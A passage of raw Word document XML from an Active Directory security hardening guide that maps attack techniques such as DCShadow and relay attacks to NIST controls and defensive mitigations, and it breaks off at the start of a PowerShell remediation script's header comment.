                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Generate immediate SIEM alerts if non-DC accounts hold this right.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6E74" w14:paraId="275F1904" w14:textId="77777777" w:rsidTr="00DF2381">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1695" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54B857C4" w14:textId="773A7229" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>DCShadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2619" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F0BCE93" w14:textId="3CC83A38" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">T1207: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Rogue Domain Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39F04F6D" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54DD62AB" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CD34B1E" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="126934EE" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CM-3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A57AD8F" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4300A51C" w14:textId="2405FBA2" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SI-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3209" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34670403" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Enforce strict network-level segmentation blocking all unauthorized replication traffic (RPC/DRSUAPI) between non-DC assets.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CB2D311" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0ACAF67F" w14:textId="67F74BEC" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Alert on changes to the AD Configuration Partition.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6E74" w14:paraId="0463AA89" w14:textId="77777777" w:rsidTr="00DF2381">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1695" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29B9E01A" w14:textId="24A47D34" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Relay Attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2619" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5AD71757" w14:textId="63D15499" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">T1557: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Financial / Credential Interception (Man-in-the-Middle (MitM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B187D91" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40C67A2B" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01891854" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>IA-5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36759D33" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08A752E7" w14:textId="2A7F6760" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SC-8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3209" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03CB20AB" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Disable LLMNR and NBT-NS via automated script.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21CFA351" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="162429C8" w14:textId="7B20006E" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Enforce SMB Signing (Required) and LDAP Channel Binding / Signing across all network endpoints.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EE0ADD1" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19E3AB3C" w14:textId="06D51460" w:rsidR="000B6E74" w:rsidRPr="00B4067B" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Automated Active Directory Audit and Remediation Tool (PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11268D4E" w14:textId="66DB4EBF" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To satisfy CORA Cyber Maintenance (50% score) and continuously update your eMASS security baseline, this script will target critical attack surfaces used most often in Kerberoasting, Relay Attacks, and Alternate Authentication threats. Run this script via an automated pipeline (e.g., Azure Automation, Ansible, or Windows built-in Scheduled Tasks) to continuously mitigate these flaws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2500B73B" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="000B6E74">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE36352" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRDefault="00B4067B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="040608EF" w14:textId="6AD0EB65" w:rsidR="00133311" w:rsidRPr="00133311" w:rsidRDefault="00133311">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;#</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>.SYNOPSIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Automated CORA Active Directory &amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Network </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hardening Script.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Maps directly </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> NIST SP 800-53 Rev 5 (AC-4, IA-5, SC-8) </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>.DESCRIPTION</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Remediates LLMNR/NBT-NS (Relay Attacks), enforces</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Signing, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    audits</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Service </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Principal Names (Kerberoasting).</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
